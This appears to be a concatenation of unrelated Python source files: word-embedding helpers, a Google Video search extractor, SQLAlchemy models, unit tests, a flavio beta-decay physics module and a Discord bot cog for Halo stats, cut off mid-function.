        # Only the first max_length tokens of each sentence are embedded.
        for col, token in enumerate(tokens[:max_length]):
            if token in word_to_index:
                mapped += 1
                embedding_matrix[row, col] = word_vectors[word_to_index[token]]
            elif replace_disease_gene_tokens and token == DISEASE_PLACEHOLDER.lower():
                # Placeholder tokens do not count toward min_words_mapped.
                embedding_matrix[row, col] = word_vectors[word_to_index['disease']]
            elif replace_disease_gene_tokens and token == GENE_PLACEHOLDER.lower():
                embedding_matrix[row, col] = word_vectors[word_to_index['gene']]
        if mapped < min_words_mapped:
            # Too few real words mapped: mark the whole sentence as invalid.
            embedding_matrix[row, :, :] = np.full((max_length, vector_dim), np.nan)
    return embedding_matrix
def get_sentence_vector_array(sentences_tokenized, word_vectors, word_to_index, min_vector_count, remove_punctuation,
                              replace_disease_gene_tokens=True):
    """
    Represent each sentence as the average of its word vectors.

    :param sentences_tokenized: list of list of strings - the tokenized sentences
    :param word_vectors: dict mapping integer word indices to their word vectors
    :param word_to_index: dict mapping words to their integer index in word_vectors
    :param min_vector_count: minimal number of word vectors required per sentence;
        sentences below this threshold are represented as NaN and a warning is logged
    :param remove_punctuation: if True, tokens that are pure punctuation are skipped
    :param replace_disease_gene_tokens: if True, tagged disease/gene tokens are mapped
        to the vectors for 'disease' and 'gene'; if False they are ignored
    :return: 2-D numpy array, one averaged vector per sentence
    """
    vector_dim = len(word_vectors[0])
    sentence_array = np.zeros((len(sentences_tokenized), vector_dim))
    for sentence_index, sentence in enumerate(sentences_tokenized):
        vector_count = 0
        sentence_vec = np.zeros(vector_dim)
        for word in sentence:
            if remove_punctuation and word.strip() in string.punctuation:
                continue
            if word not in word_to_index and replace_disease_gene_tokens and word == DISEASE_PLACEHOLDER.lower():
                vector_count += 1
                sentence_vec += word_vectors[word_to_index['disease']]
            elif word not in word_to_index and replace_disease_gene_tokens and word == GENE_PLACEHOLDER.lower():
                vector_count += 1
                sentence_vec += word_vectors[word_to_index['gene']]
            elif word in word_to_index:
                vector_count += 1
                sentence_vec += word_vectors[word_to_index[word]]
        if vector_count < min_vector_count:
            sentence_vec = np.full(vector_dim, np.nan)
            module_logger.warning('Following sentence could not be represented as a vector since only {:d} words were '
                                  'mapped to vectors: {}'.format(vector_count, ' '.join(sentence)))
        if vector_count == 0:
            # BUG FIX: previously divided by zero here (numpy RuntimeWarning);
            # the resulting values were NaN anyway, so write NaN explicitly.
            sentence_array[sentence_index] = np.full(vector_dim, np.nan)
        else:
            sentence_array[sentence_index] = sentence_vec / vector_count
    return sentence_array
|
1689088
|
import itertools
import re
from .common import SearchInfoExtractor
class GoogleSearchIE(SearchInfoExtractor):
    """Extractor for Google Video search (``gvsearchN:query`` URLs)."""
    IE_DESC = 'Google Video search'
    IE_NAME = 'video.google:search'
    _SEARCH_KEY = 'gvsearch'
    _TESTS = [{
        'url': 'gvsearch15:python language',
        'info_dict': {
            'id': 'python language',
            'title': 'python language',
        },
        'playlist_count': 15,
    }]
    _PAGE_SIZE = 100

    def _search_results(self, query):
        """Yield url_result entries for every search hit, paging until the
        "next" pagination link disappears."""
        page_index = 0
        while True:
            page = self._download_webpage(
                'http://www.google.com/search', f'gvsearch:{query}',
                note=f'Downloading result page {page_index + 1}',
                query={
                    'tbm': 'vid',
                    'q': query,
                    'start': page_index * self._PAGE_SIZE,
                    'num': self._PAGE_SIZE,
                    'hl': 'en',
                })
            for result_url in re.findall(r'<div[^>]* class="dXiKIc"[^>]*><a href="([^"]+)"', page):
                yield self.url_result(result_url)
            if not re.search(r'id="pnnext"', page):
                return
            page_index += 1
|
1689209
|
import sqlalchemy as sa
from karmabot.db.modelbase import SqlAlchemyBase
class KarmaUser(SqlAlchemyBase):
    """Slack user tracked in the karma database."""

    __tablename__ = "karma_user"

    user_id = sa.Column(sa.String, primary_key=True)
    username = sa.Column(sa.String)
    karma_points = sa.Column(sa.Integer, default=0)

    def formatted_user_id(self):
        """Return the user id wrapped in Slack's mention markup."""
        return "<@{}>".format(self.user_id)

    def __repr__(self):
        """Debug representation with id, username and karma total."""
        return "<KarmaUser> ID: {} | Username: {} | Karma-Points: {}".format(
            self.user_id, self.username, self.karma_points
        )
|
1689226
|
from sqlalchemy import Column, event, Index, Integer, String
from rdr_service.model.base import Base, model_insert_listener
from rdr_service.model.utils import UTCDateTime
class ApiUser(Base):
    """Record of a (system, username) pair that has called the API."""
    __tablename__ = "api_user"

    # Surrogate primary key.
    id = Column("id", Integer, primary_key=True, autoincrement=True, nullable=False)
    # Creation timestamp; populated by the before_insert listener below.
    created = Column("created", UTCDateTime)
    # Identifier of the calling system.
    system = Column("system", String(80), nullable=False)
    # Username within that system.
    username = Column('username', String(255), nullable=False)


# Composite index to speed lookups by (system, username).
Index('api_username_system', ApiUser.system, ApiUser.username)
# Fill in the `created` field automatically on insert.
event.listen(ApiUser, "before_insert", model_insert_listener)
|
1689267
|
from unittest import TestCase
from jsonmapping import StatementsVisitor
from .util import resolver, fixture_uri
def load_maker(stmts):
    """Build a loader that yields statement dicts for a given subject.

    Every (s, p, o, t) tuple in *stmts* whose subject matches is emitted as
    a dict with a fixed 'source' of 'foo'.
    """
    def _load(subject):
        matching = (quad for quad in stmts if quad[0] == subject)
        for s, p, o, t in matching:
            yield {
                'subject': s,
                'predicate': p,
                'object': o,
                'type': t,
                'source': 'foo',
            }
    return _load
class StatementsTestCase(TestCase):
    """Tests for StatementsVisitor triplify/objectify round-tripping."""

    def setUp(self):
        self.mapping, self.uri = fixture_uri('everypol/mapping.json')
        self.schema_uri = 'http://www.popoloproject.com/schemas/person.json#'
        self.schema = {'$ref': self.schema_uri}
        resolver.store[self.uri] = self.mapping
        super(StatementsTestCase, self).setUp()

    def test_basic_statement_conversion(self):
        """An object without an id yields statements with one urn:uuid subject."""
        sv = StatementsVisitor(self.schema, resolver)
        data = {
            'name': 'The Count'
        }
        stmts = list(sv.triplify(data))
        assert len(stmts) == 2, len(stmts)
        subj = [a for a, _, _, _ in stmts]
        assert len(set(subj)) == 1, subj
        assert subj[0].startswith('urn:uuid'), subj

    def test_subject_properties(self):
        """An explicit 'id' becomes the subject of every emitted statement."""
        sv = StatementsVisitor(self.schema, resolver)
        data = {
            'id': 'the-count',
            'name': 'The Count'
        }
        stmts = list(sv.triplify(data))
        assert len(stmts) == 3, len(stmts)
        subj = [a for a, _, _, _ in stmts]
        assert len(set(subj)) == 1, subj
        assert subj[0] == 'the-count', subj

    def test_nested_object(self):
        """Nested objects produce statements with distinct subjects."""
        sv = StatementsVisitor(self.schema, resolver)
        data = {
            'id': 'the-count',
            'name': '<NAME>',
            'memberships': [{
                'role': 'Counter',
                'organization': {
                    'name': 'Beans'
                }
            }]
        }
        stmts = list(sv.triplify(data))
        assert len(stmts) == 9, len(stmts)
        subj = [a for a, _, _, _ in stmts]
        assert len(set(subj)) == 3, subj

    def test_reverse_objectify(self):
        """Objectifying the triplified statements reconstructs nested values."""
        sv = StatementsVisitor(self.schema, resolver)
        data = {
            'id': 'the-count',
            'name': '<NAME>',
            'memberships': [{
                'role': 'Counter',
                'organization': {
                    'id': 'beans',
                    'name': 'Beans'
                }
            }]
        }
        stmts = list(sv.triplify(data))
        loader = load_maker(stmts)
        obj = sv.objectify(loader, data['id'], depth=4)
        assert obj['id'] == data['id']
        oname = obj['memberships'][0]['organization']['name']
        # BUG FIX: this previously read the same path from `obj` twice,
        # making the assert a tautology; compare against the input data.
        dname = data['memberships'][0]['organization']['name']
        assert oname == dname, obj
|
1689294
|
import doctest
from insights.combiners import package_provides_httpd
from insights.parsers.package_provides_httpd import PackageProvidesHttpd
from insights.combiners.package_provides_httpd import PackageProvidesHttpdAll
from insights.tests import context_wrap
# Fixture outputs: each line pairs an httpd binary path with the RPM
# package that provides it (software-collection, base, and JBCS builds).
PACKAGE_COMMAND_MATCH_1 = """
/opt/rh/httpd24/root/usr/sbin/httpd httpd24-httpd-2.4.34-7.el7.x86_64
"""

PACKAGE_COMMAND_MATCH_2 = """
/usr/sbin/httpd httpd-2.4.6-88.el7.x86_64
"""

PACKAGE_COMMAND_MATCH_3 = """
/opt/rh/jbcs-httpd24/root/usr/sbin/httpd jbcs-httpd24-httpd-2.4.34-7.el7.x86_64
"""
def test_packages_provide_httpd():
    """Combine three parser results and exercise all lookup helpers."""
    parsers = [
        PackageProvidesHttpd(context_wrap(raw))
        for raw in (PACKAGE_COMMAND_MATCH_1,
                    PACKAGE_COMMAND_MATCH_2,
                    PACKAGE_COMMAND_MATCH_3)
    ]
    result = PackageProvidesHttpdAll(parsers)
    expected_paths = [
        '/opt/rh/httpd24/root/usr/sbin/httpd',
        '/usr/sbin/httpd',
        '/opt/rh/jbcs-httpd24/root/usr/sbin/httpd',
    ]
    assert sorted(result.running_httpds) == sorted(expected_paths)
    # Item access, get_package() and get() all map binary path -> package.
    assert result["/usr/sbin/httpd"] == "httpd-2.4.6-88.el7.x86_64"
    assert result.get_package("/opt/rh/httpd24/root/usr/sbin/httpd") == "httpd24-httpd-2.4.34-7.el7.x86_64"
    assert result.get("/opt/rh/httpd24/root/usr/sbin/httpd") == "httpd24-httpd-2.4.34-7.el7.x86_64"
    # Unknown binaries resolve to None rather than raising.
    assert result.get_package("/usr/lib/httpd") is None
    assert result.get("/usr/lib/httpd") is None
def test_doc_examples():
    """Run the combiner module's doctests against a prepared `packages` object."""
    packs = [
        PackageProvidesHttpd(context_wrap(raw))
        for raw in (PACKAGE_COMMAND_MATCH_1, PACKAGE_COMMAND_MATCH_2)
    ]
    env = {'packages': package_provides_httpd.PackageProvidesHttpdAll(packs)}
    failed, _ = doctest.testmod(package_provides_httpd, globs=env)
    assert failed == 0
|
1689369
|
r"""Functions for nuclear and neutron beta decay effective couplings and $Ft$ values."""
from math import pi, log, sqrt
import flavio
from flavio.config import config
from flavio.physics.betadecays.common import wc_eff
from flavio.physics.ckm import get_ckm
from flavio.physics.taudecays.taulnunu import GFeff
from flavio.physics import elements
from flavio.classes import Observable, Prediction
import re
def xi(C, MF, MGT):
    r"""Correlation coefficient $\xi$ as function of the effective couplings
    `C`, the Fermi matrix element `MF` and the Gamow-Teller matrix element
    `MGT`."""
    # eq. (15) of arXiv:1803.08732, with C_i' = C_i
    flavio.citations.register("Gonzalez-Alonso:2018omy")
    fermi = abs(MF)**2 * (abs(C['V'])**2 + abs(C['S'])**2)
    gamow_teller = abs(MGT)**2 * (abs(C['A'])**2 + abs(C['T'])**2)
    return 2 * (fermi + gamow_teller)
def a_xi(C, MF, MGT):
    r"""Correlation coefficients $a\xi$ as function of the effective couplings
    `C`, the Fermi matrix element `MF` and the Gamow-Teller matrix element
    `MGT`."""
    # eq. (16) of arXiv:1803.08732, with C_i' = C_i
    flavio.citations.register("Gonzalez-Alonso:2018omy")
    fermi = abs(MF)**2 * (abs(C['V'])**2 - abs(C['S'])**2)
    gamow_teller = abs(MGT)**2 * (abs(C['A'])**2 - abs(C['T'])**2)
    return 2 * (fermi - 1 / 3 * gamow_teller)
def a(C, MF, MGT):
    r"""Correlation coefficient $a$ as function of the effective couplings
    `C`, the Fermi matrix element `MF` and the Gamow-Teller matrix element
    `MGT`."""
    # Normalize the raw coefficient by xi.
    numerator = a_xi(C, MF, MGT)
    return numerator / xi(C, MF, MGT)
def b_xi(C, MF, MGT, alpha, Z, s):
    r"""Correlation coefficients $b\xi$ as function of the effective couplings
    `C`, the Fermi matrix element `MF`, the Gamow-Teller matrix element
    `MGT`, the fine structure constant `alpha`, and the nucleon charge `Z`.
    The sign `s` is + for the electron and - for the positron."""
    # eq. (17) of arXiv:1803.08732, with C_i' = C_i
    flavio.citations.register("Gonzalez-Alonso:2018omy")
    gamma = sqrt(1 - alpha**2 * Z**2)
    fermi = abs(MF)**2 * (C['V'] * C['S'].conjugate()).real
    gamow_teller = abs(MGT)**2 * (C['A'] * C['T'].conjugate()).real
    return s * 2 * gamma * 2 * (fermi + gamow_teller)
def dl(Jp, J):
    """Kronecker's delta: 1 if `Jp` equals `J`, else 0."""
    return 1 if Jp == J else 0
def la(Jp, J):
    """Eq. (A1): angular-momentum factor for `Jp` in {J-1, J, J+1}."""
    if Jp == J - 1:
        return 1
    if Jp == J:
        return 1 / (J + 1)
    if Jp == J + 1:
        return -J / (J + 1)
    # Any other combination of angular momenta is not allowed.
    raise ValueError("Invalid input for function `la`")
def A_xi(C, MF, MGT, J, Jf, s):
    r"""Correlation coefficients $A\xi$ as function of the effective couplings
    `C`, the Fermi matrix element `MF`, the Gamow-Teller matrix element
    `MGT`, and the angular momenta of initial and final state nuclei,
    `J` and `Jf`. The sign `s` is + for the electron and - for the
    positron."""
    # note that C_i' = C_i
    gt_term = s * abs(MGT)**2 * la(Jf, J) * (abs(C['T'])**2 - abs(C['A'])**2)
    interference = (dl(Jf, J) * abs(MF) * abs(MGT) * sqrt(J / (J + 1))
                    * (2 * C['S'] * C['T'].conjugate()
                       - 2 * C['V'] * C['A'].conjugate()))
    return 2 * (gt_term + interference).real
def B_xi(C, MF, MGT, J, Jf, me_E, s):
    r"""Correlation coefficients $B\xi$ as function of the effective couplings
    `C`, the Fermi matrix element `MF`, the Gamow-Teller matrix element
    `MGT`, and the angular momenta of initial and final state nuclei,
    `J` and `Jf`. `me_E` is the ratio of electron mass and energy.
    The sign `s` is + for the electron and - for the positron."""
    # note that C_i' = C_i
    # First summand: pure Gamow-Teller term (with la); second summand:
    # Fermi/Gamow-Teller interference (with dl). The real part of the whole
    # complex combination is taken at the end.
    return 2 * (abs(MGT)**2 * la(Jf, J) * (me_E * 2 * C['T'] * C['A'].conjugate()
                + s * (abs(C['T'])**2 + abs(C['A'])**2))
                - dl(Jf, J) * abs(MF) * abs(MGT) * sqrt(J / (J + 1))
                * ((2 * C['S'] * C['T'].conjugate()
                    + 2 * C['V'] * C['A'].conjugate())
                    + s * me_E * (2 * C['S'] * C['A'].conjugate()
                    + 2 * C['V'] * C['T'].conjugate()))).real
def D_xi(C, MF, MGT, J, Jf):
    r"""Correlation coefficients $D\xi$ as function of the effective couplings
    `C`, the Fermi matrix element `MF`, the Gamow-Teller matrix element
    `MGT`, and the angular momenta of initial and final state nuclei,
    `J` and `Jf`."""
    # note that C_i' = C_i
    prefactor = dl(Jf, J) * abs(MF) * abs(MGT) * sqrt(J / (J + 1))
    couplings = (2 * C['S'] * C['T'].conjugate()
                 - 2 * C['V'] * C['A'].conjugate())
    return 2 * (prefactor * couplings).imag
def R_xi(C, MF, MGT, J, Jf, s):
    r"""Correlation coefficients $R\xi$ as function of the effective couplings
    `C`, the Fermi matrix element `MF`, the Gamow-Teller matrix element
    `MGT`, and the angular momenta of initial and final state nuclei,
    `J` and `Jf`. The sign `s` is + for the electron and - for the positron."""
    # note that C_i' = C_i
    # Gamow-Teller term (la) plus Fermi/Gamow-Teller interference (dl);
    # the imaginary part of the complex combination is taken at the end.
    return 2 * (s * abs(MGT)**2 * la(Jf, J) * 2 * C['T'] * C['A'].conjugate()
                + dl(Jf, J) * abs(MF) * abs(MGT) * sqrt(J / (J + 1))
                * (2 * C['S'] * C['A'].conjugate()
                - 2 * C['V'] * C['T'].conjugate())).imag
def b(C, MF, MGT, alpha, Z, s):
    r"""Correlation coefficient $b$ as function of the effective couplings
    `C`, the Fermi matrix element `MF`, the Gamow-Teller matrix element
    `MGT`, the fine structure constant `alpha`, and the nucleon charge `Z`."""
    numerator = b_xi(C, MF, MGT, alpha, Z, s)
    return numerator / xi(C, MF, MGT)
def A(C, MF, MGT, J, Jf, s):
    r"""Correlation coefficient $A$ as function of the effective couplings
    `C`, the Fermi matrix element `MF`, the Gamow-Teller matrix element
    `MGT`, and the angular momenta of initial and final state nuclei,
    `J` and `Jf`. The sign `s` is + for the electron and - for the
    positron."""
    numerator = A_xi(C, MF, MGT, J, Jf, s)
    return numerator / xi(C, MF, MGT)
def B(C, MF, MGT, J, Jf, me_E, s):
    r"""Correlation coefficient $B$ as function of the effective couplings
    `C`, the Fermi matrix element `MF`, the Gamow-Teller matrix element
    `MGT`, and the angular momenta of initial and final state nuclei,
    `J` and `Jf`. `me_E` is the ratio of electron mass and energy.
    The sign `s` is + for the electron and - for the positron."""
    numerator = B_xi(C, MF, MGT, J, Jf, me_E, s)
    return numerator / xi(C, MF, MGT)
def D(C, MF, MGT, J, Jf):
    r"""Correlation coefficient $D$ as function of the effective couplings
    `C`, the Fermi matrix element `MF`, the Gamow-Teller matrix element
    `MGT`, and the angular momenta of initial and final state nuclei,
    `J` and `Jf`."""
    numerator = D_xi(C, MF, MGT, J, Jf)
    return numerator / xi(C, MF, MGT)
def R(C, MF, MGT, J, Jf, s):
    r"""Correlation coefficient $R$ as function of the effective couplings
    `C`, the Fermi matrix element `MF`, the Gamow-Teller matrix element
    `MGT`, and the angular momenta of initial and final state nuclei,
    `J` and `Jf`. The sign `s` is + for the electron and - for the positron."""
    numerator = R_xi(C, MF, MGT, J, Jf, s)
    return numerator / xi(C, MF, MGT)
def K(par):
    r"""Normalization constant $K = 2\pi^3 \log 2 / m_e^5$, built from the
    electron mass in the parameter dictionary `par`."""
    electron_mass = par['m_e']
    return 2 * pi**3 * log(2) / electron_mass**5
# <me/E> from Table 4 of arXiv:1803.08732
# Superallowed 0+ -> 0+ nuclides: daughter charge-relevant proton number `Z`,
# the average ratio <me/E> of electron mass over energy, and a TeX label.
nuclei_superallowed = {
    # superallowed 0+->0+
    '10C': {'Z': 6, '<me/E>': 0.619, 'tex': r'{}^{10}\text{C}'},
    '14O': {'Z': 8, '<me/E>': 0.438, 'tex': r'{}^{14}\text{O}'},
    '22Mg': {'Z': 12, '<me/E>': 0.310, 'tex': r'{}^{22}\text{Mg}'},
    '26mAl':{'Z': 13, '<me/E>': 0.300, 'tex': r'{}^{26m}\text{Al}'},
    '34Cl': {'Z': 17, '<me/E>': 0.234, 'tex': r'{}^{34}\text{Cl}'},
    '34Ar': {'Z': 18, '<me/E>': 0.212, 'tex': r'{}^{34}\text{Ar}'},
    '38mK': {'Z': 19, '<me/E>': 0.213, 'tex': r'{}^{38m}\text{K}'},
    '38Ca': {'Z': 20, '<me/E>': 0.195, 'tex': r'{}^{38}\text{Ca}'},
    '42Sc': {'Z': 21, '<me/E>': 0.201, 'tex': r'{}^{42}\text{Sc}'},
    '46V': {'Z': 23, '<me/E>': 0.183, 'tex': r'{}^{46}\text{V}'},
    '50Mn': {'Z': 25, '<me/E>': 0.169, 'tex': r'{}^{50}\text{Mn}'},
    '54Co': {'Z': 27, '<me/E>': 0.157, 'tex': r'{}^{54}\text{Co}'},
    '62Ga': {'Z': 31, '<me/E>': 0.141, 'tex': r'{}^{62}\text{Ga}'},
    '74Rb': {'Z': 37, '<me/E>': 0.125, 'tex': r'{}^{74}\text{Rb}'},
}
def Ft_superallowed(par, wc_obj, A):
    r"""Corrected $\mathcal{F}t$ value of the beta decay of isotope `A`."""
    # Superallowed 0+ -> 0+: pure Fermi transition.
    MF = sqrt(2)
    MGT = 0
    nucleus = nuclei_superallowed[A]
    scale = config['renormalization scale']['betadecay']
    C = wc_eff(par, wc_obj, scale, nu='e')
    Xi = xi(C, MF, MGT)
    fierz = b(C, MF, MGT, par['alpha_e'], nucleus['Z'], s=-1)  # s=-1 for beta+ decay
    me_E = nucleus['<me/E>']
    Vud = get_ckm(par)[0, 0]
    GF = GFeff(wc_obj, par)
    pre = GF / sqrt(2) * Vud
    # relative uncertainty on \delta R' (universal)
    ddRp = par['delta_deltaRp_Z2'] * nucleus['Z']**2
    return (1 + ddRp) * K(par) / Xi * 1 / (1 + fierz * me_E) / abs(pre)**2
class NeutronObservable:
    """Base class for observables of free neutron beta decay.

    Collects the effective couplings and the matrix elements and quantum
    numbers of the neutron transition; the thin wrapper methods below
    delegate to the module-level correlation-coefficient functions.
    """
    def __init__(self, wc_obj, par, me_E):
        # Wilson coefficient object and parameter dictionary.
        self.wc_obj = wc_obj
        self.par = par
        # Ratio of electron mass and energy (see the module-level functions).
        self.me_E = me_E
        # Fermi and Gamow-Teller matrix elements of the neutron.
        self.MF = 1
        self.MGT = sqrt(3)
        self.scale = config['renormalization scale']['betadecay']
        # Effective couplings C_V, C_A, C_S, C_T at the beta-decay scale.
        self.C = wc_eff(par, wc_obj, self.scale, nu='e')
        self.s = 1  # electron e- in final state
        self.Z = 0
        self.alpha = par['alpha_e']
        # Spin 1/2 for both the neutron and the proton.
        self.J = 1 / 2
        self.Jf = 1 / 2
    def xi(self):
        # Overall normalization xi.
        return xi(self.C, self.MF, self.MGT)
    def a(self):
        # Beta-neutrino correlation coefficient.
        return a(self.C, self.MF, self.MGT)
    def b(self):
        # Fierz interference coefficient b.
        return b(self.C, self.MF, self.MGT, self.alpha, self.Z, self.s)
    def A(self):
        return A(self.C, self.MF, self.MGT, self.J, self.Jf, self.s)
    def B(self):
        return B(self.C, self.MF, self.MGT, self.J, self.Jf, self.me_E, self.s)
    def D(self):
        return D(self.C, self.MF, self.MGT, self.J, self.Jf)
    def R(self):
        return R(self.C, self.MF, self.MGT, self.J, self.Jf, self.s)
class Neutron_tau(NeutronObservable):
    """Neutron lifetime, computed from the corrected decay rate."""
    def __init__(self, wc_obj, par, me_E):
        super().__init__(wc_obj, par, me_E)
    def __call__(self):
        Vud = get_ckm(self.par)[0, 0]
        GF = GFeff(self.wc_obj, self.par)
        prefactor = GF / sqrt(2) * Vud
        # ft value including the Fierz-term correction.
        ft = K(self.par) / self.xi() / (1 + self.b() * self.me_E) / abs(prefactor)**2
        # Convert the ft value into a lifetime using the phase-space factor
        # f_n and the radiative correction deltaRp_n.
        return ft / log(2) / self.par['f_n'] / (1 + self.par['deltaRp_n'])
class Neutron_corr(NeutronObservable):
    """Correlation coefficient of neutron beta decay selected by `coeff`.

    `coeff` is one of 'a', 'atilde', 'b', 'A', 'Atilde', 'B', 'Btilde',
    'lambdaAB', 'D', 'R'; the "tilde" variants divide by the Fierz-term
    factor 1 + b <me/E>.
    """
    def __init__(self, wc_obj, par, me_E, coeff):
        super().__init__(wc_obj, par, me_E)
        self.coeff = coeff
    def __call__(self):
        if self.coeff == 'a':
            return self.a()
        elif self.coeff == 'atilde':
            return self.a() / (1 + self.b() * self.me_E)
        # BUG FIX: this branch used a bare `if`, breaking the elif chain;
        # harmless only because every earlier branch returns.
        elif self.coeff == 'b':
            return self.b()
        elif self.coeff == 'A':
            return self.A()
        elif self.coeff == 'Atilde':
            return self.A() / (1 + self.b() * self.me_E)
        elif self.coeff == 'B':
            return self.B()
        elif self.coeff == 'Btilde':
            return self.B() / (1 + self.b() * self.me_E)
        elif self.coeff == 'lambdaAB':
            _A = self.A()
            _B = self.B()
            return (_A - _B) / (_A + _B)
        elif self.coeff == 'D':
            return self.D()
        elif self.coeff == 'R':
            return self.R()
        else:
            # Previously fell through and returned None silently.
            raise ValueError("Unknown correlation coefficient %r" % self.coeff)
# Closures for prediction instances
def Ft_fct(A):
    """Return a prediction function `(wc_obj, par) -> Ft` for nuclide `A`."""
    def predict(wc_obj, par):
        return Ft_superallowed(par, wc_obj, A)
    return predict
def get_daughter(nuclide):
    r"""Get the symbol and tex code of the daughter nuclide."""
    # Split e.g. '26mAl' into the mass number '26' and the element
    # symbol 'Al' (first upper-case letter onwards).
    mass_number = re.search(r'\d+', nuclide).group()
    symbol = re.search(r'[A-Z].*', nuclide).group()
    # The daughter of the beta+ decay has one proton less.
    daughter_symbol = elements.symbol(elements.Z(symbol) - 1)
    return {'name': '{}{}'.format(mass_number, daughter_symbol),
            'tex': r'{{}}^{{{}}}\text{{{}}}'.format(mass_number, daughter_symbol)}
# Observable and Prediction instances
# Register one Ft observable (with taxonomy, description and TeX label)
# and its prediction per superallowed nuclide.
for _A, _Ad in nuclei_superallowed.items():
    Dd = get_daughter(_A)
    _process_tex = _Ad['tex'] + r"\to " + Dd['tex'] + r"\,e^+\nu_e"
    _process_taxonomy = r'Process :: Nucleon decays :: Beta decays :: Superallowed $0^+\to 0^+$ decays :: $' + _process_tex + r"$"
    _obs_name = "Ft(" + _A + ")"
    _obs = Observable(_obs_name)
    _obs.set_description(r"$\mathcal Ft$ value of $" + _Ad['tex'] + r"$ beta decay")
    _obs.tex = r"$\mathcal{F}t(" + _Ad['tex'] + r")$"
    _obs.add_taxonomy(_process_taxonomy)
    Prediction(_obs_name, Ft_fct(_A))
# Neutron lifetime observable; it takes <me/E> as an extra argument.
_process_tex = r"n\to p^+ e^-\bar\nu_e"
_process_taxonomy = r'Process :: Nucleon decays :: Beta decays :: Neutron decay :: $' + _process_tex + r"$"
_obs_name = "tau_n"
_obs = Observable(_obs_name, arguments=['me_E'])
_obs.set_description(r"Neutron lifetime")
_obs.tex = r"$\tau_n$"
_obs.add_taxonomy(_process_taxonomy)
func = lambda wc_obj, par, me_E: Neutron_tau(wc_obj, par, me_E)()
Prediction(_obs_name, func)
# coefficients that don't depend on me/E
# Maps coefficient key (used for the observable name "<key>_n") -> TeX label.
coeffs = {
    'a': 'a_n',
    'A': 'A_n',
    'D': 'D_n',
    'R': 'R_n',
}
# coefficients that depend on me/E
coeffs_mE = {
    'atilde': r'\tilde{a}_n',
    'b': 'b_n',
    'Atilde': r'\tilde{A}_n',
    'B': 'B_n', 'Btilde': r'\tilde{B}_n',
    'lambdaAB': r'\lambda_{AB}',
}
def make_obs_neutron_corr(coeff, me_E=False, tex=None):
    """Register the Observable and Prediction for one neutron-decay
    correlation coefficient.

    Args:
        coeff: coefficient key, e.g. 'a' or 'Atilde'.
        me_E: whether the observable takes `me_E` as an argument.
        tex: TeX label; looked up in `coeffs`/`coeffs_mE` when omitted.
    """
    # BUG FIX: the TeX label used to be read from the module-global `tex`
    # left over from the calling loop; resolve it explicitly instead so the
    # function also works when called on its own.
    if tex is None:
        tex = {**coeffs, **coeffs_mE}[coeff]
    _process_tex = r"n\to p^+ e^-\bar\nu_e"
    _process_taxonomy = r'Process :: Nucleon decays :: Beta decays :: Neutron decay :: $' + _process_tex + r"$"
    _obs_name = coeff + "_n"
    if me_E:
        _obs = Observable(_obs_name, arguments=['me_E'])
    else:
        _obs = Observable(_obs_name)
    _obs.set_description(r"Correlation coefficient $" + tex + r"$ in neutron beta decay")
    _obs.tex = r"$" + tex + r"$"
    _obs.add_taxonomy(_process_taxonomy)
    if me_E:
        func = lambda wc_obj, par, me_E: Neutron_corr(wc_obj, par, me_E, coeff)()
    else:
        func = lambda wc_obj, par: Neutron_corr(wc_obj, par, None, coeff)()
    Prediction(_obs_name, func)
# Register Observables/Predictions for all neutron correlation coefficients.
for coeff, tex in coeffs.items():
    make_obs_neutron_corr(coeff, me_E=False)
for coeff, tex in coeffs_mE.items():
    make_obs_neutron_corr(coeff, me_E=True)
|
1689388
|
import asyncio
from random import choice as randchoice
import aiohttp
import discord
from redbot.core import Config, checks, commands
# Reaction emoji used by the paginated menus, keyed by action name.
numbs = {"next": "➡", "back": "⬅", "exit": "❌"}
class Halo(commands.Cog):
    """
    Display Halo 5 and Halo Wars 2 stats and information
    """

    def __init__(self, bot):
        self.bot = bot
        self.session = aiohttp.ClientSession(loop=self.bot.loop)
        default_global = {"api_token": {"token": "", "language": "en"}}
        self.config = Config.get_conf(self, 35689771456)
        self.config.register_global(**default_global)

    async def red_delete_data_for_user(self, **kwargs):
        """
        Nothing to delete
        """
        return

    async def request_url(self, url, params=None):
        """GET `url` with the stored API key and language headers and
        return the decoded JSON response."""
        header_data = await self.config.api_token()
        header = {
            "Ocp-Apim-Subscription-Key": header_data["token"],
            "Accept-Language": header_data["language"],
        }
        async with self.session.get(url, params=params, headers=header) as resp:
            return await resp.json()

    @commands.group(name="halo5")
    @checks.admin_or_permissions(manage_guild=True)
    async def _halo5(self, ctx):
        """Get information from Halo 5"""
        pass

    @commands.group(name="halowars")
    @checks.admin_or_permissions(manage_guild=True)
    async def _halowars(self, ctx):
        """Get information from Halo Wars 2"""
        pass

    def random_colour(self):
        """Return a random 24-bit RGB value for embed colouring."""
        return int("".join([randchoice("0123456789ABCDEF") for x in range(6)]), 16)

    async def halo5_playlist_menu(
        self, ctx, post_list: list, message: discord.Message = None, page=0, timeout: int = 30
    ):
        """menu control logic for this taken from
        https://github.com/Lunar-Dust/Dusty-Cogs/blob/master/menu/menu.py"""
        s = post_list[page]
        created_at = ctx.message.created_at
        em = discord.Embed(
            title=s["name"],
            description=s["description"],
            colour=discord.Colour(value=self.random_colour()),
            timestamp=created_at,
        )
        em.add_field(name="Gamemode", value=s["gameMode"])
        em.add_field(name="Ranked", value=str(s["isRanked"]))
        if s["imageUrl"] is not None:
            em.set_image(url=s["imageUrl"])
        if not message:
            message = await ctx.send(embed=em)
            await message.add_reaction("⬅")
            await message.add_reaction("❌")
            await message.add_reaction("➡")
        else:
            # message edits don't return the message object anymore lol
            await message.edit(embed=em)
        check = lambda react, user: user == ctx.message.author and react.emoji in ["➡", "⬅", "❌"]
        try:
            react, user = await self.bot.wait_for("reaction_add", check=check, timeout=timeout)
        except asyncio.TimeoutError:
            # Menu expired: remove the navigation reactions and stop.
            await message.remove_reaction("⬅", self.bot.user)
            await message.remove_reaction("❌", self.bot.user)
            await message.remove_reaction("➡", self.bot.user)
            return None
        else:
            reacts = {v: k for k, v in numbs.items()}
            react = reacts[react.emoji]
            if react == "next":
                next_page = 0
                if page == len(post_list) - 1:
                    next_page = 0  # Loop around to the first item
                else:
                    next_page = page + 1
                return await self.halo5_playlist_menu(
                    ctx, post_list, message=message, page=next_page, timeout=timeout
                )
            elif react == "back":
                next_page = 0
                if page == 0:
                    next_page = len(post_list) - 1  # Loop around to the last item
                else:
                    next_page = page - 1
                return await self.halo5_playlist_menu(
                    ctx, post_list, message=message, page=next_page, timeout=timeout
                )
            else:
                return await message.delete()

    @_halo5.command(name="playlist")
    async def halo5_playlist(self, ctx, active=True):
        """Gathers data about active Halo 5 playlists"""
